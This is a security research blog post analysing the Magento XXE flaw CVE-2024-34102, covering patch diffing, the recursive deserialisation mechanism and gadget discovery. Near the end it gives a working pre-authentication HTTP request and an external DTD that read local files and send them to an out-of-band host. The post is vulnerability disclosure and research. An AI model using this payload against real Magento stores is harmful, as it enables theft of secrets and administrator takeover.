June 26, 2024

Why nested deserialization is harmful: Magento XXE (CVE-2024-34102)

No items found.

Creative Commons license

Magento is one of the most popular e-commerce solutions in use on the internet. It's estimated that there are over 140,000 instances of Magento running as of late 2023. Adobe's most recent advisory for Adobe Commerce / Magento, published on June 11th, 2024 highlighted a critical, pre-authentication XML entity injection issue (CVE-2024-34102) which Adobe rated as CVSS 9.8.

It was quite surprising to us that no public proof-of-concept existed at the time of us reading the advisory. Given the criticality of this issue and in order to provide customers of our Attack Surface Management Platform certainty around the exploitability of this issue, our security research team developed a proof-of-concept, well before our customers could be exploited by malicious actors.

We believe that the vulnerability is severe is due to the following reasons:

- It is possible to exfiltrate the app/etc/env.php file from Magento, which contains a cryptographic key used to sign JWTs used for authentication. An attacker can craft an administrator JWT and abuse Magento's APIs as an admin user on affected installations.

- The vulnerability can be chained with recent research in PHP filter chains leading to RCE through the CVE-2024-2961 exploit, credit to Charles Fol.

- The broader impacts of XXE (any local file or remote URL's contents can be exfiltrated).

We want to acknowledge the original author for his excellent work on discovering this vulnerability, Sergey Temnikov. Shortly after this vulnerability was dubbed "CosmicString" by SanSec, he released a limited write-up of the issue, which discusses his methodology in discovering this issue but does not reveal the proof of concept. We highly recommend reading this write-up as he explains Magento's internal deserialization process and its inherent dangers.

As we tracked the public knowledge of this vulnerability, we found that SanSec's original emergency mitigation could be bypassed, and Sergey's first iteration of the "fixed" mitigation could also be bypassed. This led to both SanSec and Sergey updating their emergency hotfix mitigations over time.

This was interesting to observe as it highlighted the importance and effectiveness of peer review when it comes to emergency hot fixes and an argument for why disclosing the technical details of a vulnerability is important for the broader security industry.

To understand the key differences between an unpatched version of Magento and a patched one, we downloaded the packages magento2-2.4.7.zip (unpatched) and magento2-2.4.7-p1.zip (patched) from the Magneto GitHub repository. Extracting these and then running DiffMerge on these two directories revealed a very important clue to discovering this vulnerability:

With the information that was publicly available, i.e., SanSec's first patch (blocking dataIsURL inside the POST body) as well as the diff we can see in the image above, it was clear to us that this vulnerability was to do with instantiating a SimpleXMLElement. PHP's documentation for this class revealed that dataIsURL is an argument that can be passed to the SimpleXMLElement constructor, which allows for loading XML from external sources.

The additional updates to the hotfix from Sergey revealed that you could not rely on blocking dataIsURL as the vulnerability was exploitable without this, and his mitigation focused on blocking the keyword sourceData.

With all of this information, we spent most of our time setting up a development environment for Magento and then searching for a deserialization gadget that would lead us to the instantiation of a SimpleXMLElement with controllable arguments.

When it comes to complex deserialization issues, we highly suggest setting up a development environment with the ability to debug the code by setting breakpoints. For Magento 2, we utilized the following repo to bootstrap our development efforts. This docker image includes XDebug and is already configured for PhpStorm. After spinning up this docker image, we were able to install & seed Magento with sample data using the following commands:

./scripts/composer create-project --repository-url=https://repo.magento.com/ magento/project-community-edition=2.4.7 /home/magento # 2.4.7 is the vulnerable version
./scripts/magento setup:install --base-url=http://magento2.test/ --db-host=mysql --db-name=magento_db --db-user=magento_user --db-password="PASSWD#" --admin-firstname=admin --admin-lastname=admin --admin-email=admin@admin.test --admin-user=admin --admin-password=admin1! --language=en_US --currency=USD --timezone=America/Chicago --use-rewrites=1 --search-engine opensearch --opensearch-host=opensearch --opensearch-port=9200
./scripts/magento sampledata:deploy
./scripts/magento setup:upgrade

When searching through the Magento 2 code base for Simplexml\\Element.*sourceData, we identified the following locations that could be viable targets:

~/Downloads/magento2-2.4.7/app/code/Magento/Quote/Model/Quote/Address/Total/Collector.php:
   70       * @param \Magento\Store\Model\StoreManagerInterface $storeManager
   71       * @param \Magento\Quote\Model\Quote\Address\TotalFactory $totalFactory
   72:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   73       * @param mixed $store
   74       * @param SerializerInterface $serializer

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Config/Ordered.php:
   84       * @param \Psr\Log\LoggerInterface $logger
   85       * @param \Magento\Sales\Model\Config $salesConfig
   86:      * @param \Magento\Framework\Simplexml\Element $sourceData
   87       * @param SerializerInterface $serializer
   88       */

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Order/Total/Config/Base.php:
   44       * @param \Magento\Sales\Model\Config $salesConfig
   45       * @param \Magento\Sales\Model\Order\TotalFactory $orderTotalFactory
   46:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   47       * @param SerializerInterface $serializer
   48       */

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/Base.php:
   19  
   20      /**
   21:      * @param \Magento\Framework\Simplexml\Element|string $sourceData $sourceData
   22       */
   23      public function __construct($sourceData = null)

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/BaseFactory.php:
   26       * Create config model
   27       *
   28:      * @param string|\Magento\Framework\Simplexml\Element $sourceData
   29       * @return \Magento\Framework\App\Config\Base
   30       */

From this list, we believed the most likely candidate that could be reached without authentication would be Magento/Quote/Model/Quote/Address/Total/Collector.php. We found that reading through the code itself for how the nesting worked and allowed for the instantiation of sourceData was not obvious.

To make further headway, it was necessary for us to understand at a high level how the input deserialization works. For that, we looked at magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php and its _createFromArray method:

        $data = is_array($data) ? $data : [];
        // convert to string directly to avoid situations when $className is object
        // which implements __toString method like \ReflectionObject
        $className = (string) $className;
        $class = new ClassReflection($className);
        if (is_subclass_of($className, self::EXTENSION_ATTRIBUTES_TYPE)) {
            $className = substr($className, 0, -strlen('Interface'));
        }

        // Primary method: assign to constructor parameters
        $constructorArgs = $this->getConstructorData($className, $data);
        $object = $this->objectManager->create($className, $constructorArgs);

        // Secondary method: fallback to setter methods
        foreach ($data as $propertyName => $value) {
            // ... SNIP ...

At a high level, if Magento is parsing some input data and expects a field address that contains an \Magento\Quote\Api\Data\Address, what it will do is the following:

- First, if the fields of the JSON match any of the names of the variables in the constructor of the class, pass that field as an argument;

- Second, if the name doesn't match, instead look for a method on the class named set plus the field.

For example, if you passed the following JSON to the /rest/all/V1/guest-carts/test/estimate-shipping-methods endpoint:

{
    "address": {
        "data": [1, 2, 3],
        "BaseShippingAmount" : 123
    }
}

- The field data is in the constructor of the Address class as array $data = [], so it will be passed there.

- The Address class has a method setBaseShippingAmount, so after the class is instantiated it will call ->setBaseShippingAmount(123).

The danger comes from the fact that this is done recursively: if either the constructor or the setter takes a non-primitive type, such as another class, then the deserialization process is done recursively on that field. Looking at the constructor for the Address class, is has 37 parameters, and it's clear the Magento developers did not intend for you to be able to instantiate all of these:

    public function __construct(
        Context $context,
        Registry $registry,
        ExtensionAttributesFactory $extensionFactory,
        AttributeValueFactory $customAttributeFactory,
        Data $directoryData,
        \Magento\Eav\Model\Config $eavConfig,
        \Magento\Customer\Model\Address\Config $addressConfig,
        RegionFactory $regionFactory,
        CountryFactory $countryFactory,
        AddressMetadataInterface $metadataService,
        AddressInterfaceFactory $addressDataFactory,
        RegionInterfaceFactory $regionDataFactory,
        DataObjectHelper $dataObjectHelper,
        ScopeConfigInterface $scopeConfig,
        \Magento\Quote\Model\Quote\Address\ItemFactory $addressItemFactory,
        \Magento\Quote\Model\ResourceModel\Quote\Address\Item\CollectionFactory $itemCollectionFactory,
        RateFactory $addressRateFactory,
        RateCollectorInterfaceFactory $rateCollector,
        CollectionFactory $rateCollectionFactory,
        RateRequestFactory $rateRequestFactory,
        CollectorFactory $totalCollectorFactory,
        TotalFactory $addressTotalFactory,
        Copy $objectCopyService,
        CarrierFactoryInterface $carrierFactory,
        Address\Validator $validator,
        Mapper $addressMapper,
        Address\CustomAttributeListInterface $attributeList,
        TotalsCollector $totalsCollector,
        TotalsReader $totalsReader,
        AbstractResource $resource = null,
        AbstractDb $resourceCollection = null,
        array $data = [],
        Json $serializer = null,
        StoreManagerInterface $storeManager = null,
        ?CompositeValidator $compositeValidator = null,
        ?CountryModelsCache $countryModelsCache = null,
        ?RegionModelsCache $regionModelsCache = null,
    ) {

This provides a huge surface for bugs. By traversing chains of constructors and setters, it is possible to instantiate a wide variety of internal classes that were never meant to be user-facing. And if any of those constructors or setters do dangerous things, such as in the case of SimpleXMLElement, this could lead to a security vulnerability. Further details on how to map out the pre-authentication endpoints and corresponding models can be found in Sergey's write up.

The goal is now to find a chain of types in constructors that allow us to reach one of the Simplexml sinks identified earlier. Rather than trace the constructor manually for each class, we added the following line to magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php:

private function getConstructorData(string $className, array $data): array
    {
        $preferenceClass = $this->config->getPreference($className);
        $class = new ClassReflection($preferenceClass ?: $className);

        try {
            $constructor = $class->getMethod('__construct');
        } catch (\ReflectionException $e) {
            $constructor = null;
        }

        if ($constructor === null) {
            return [];
        }

        $res = [];
        $parameters = $constructor->getParameters();
++      var_dump($parameters);

This simple var_dump helped us to quickly understand all of the different parameters we could provide when calling the unauthenticated REST APIs based on the magic deserialisation logic that Magento had built.

We found that the pre-authentication endpoint /rest/all/V1/guest-carts/test/estimate-shipping-methods mentioned earlier was likely the best candidate to reach sourceData through reading the names of the constructor elements.

Debugging the available parameters was made easier with our var_dump call, allowing us to quickly iterate on our payload with output as seen below:

  object(Laminas\Code\Reflection\ParameterReflection)#1176 (2) {
    ["name"]=>
    string(21) "totalCollectorFactory"
    ["isFromMethod":protected]=>
    bool(false)
  }

With further experimentation, we were able to develop the following payload, which instantiated a SimpleXMLElement with controllable arguments via the sourceData parameter:

POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json
Content-Length: 274

{
  "address": {
    "totalsReader": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://your_ip:9999/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
            "options": 16
          }
        }
      }
    }
  }
}

With our DTD containing:

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://collabid.oastify.com/dtd.xml?%data;'>">

This resulted in the following:

‍

Written by:

Adam Kues

Shubham Shah

Your subscription could not be saved. Please try again.

Your subscription has been successful.

More Like This

Security Research

New!

Doing the Due Diligence: Analyzing the Next.js Middleware Bypass (CVE-2025-29927)

Read on ASN Blog

Security Research

New!

Ready to get started?

Get on a call with our team and learn how Assetnote can change the way you secure your attack surface. We'll set you up with a trial instance so you can see the impact for yourself.

Request a Demo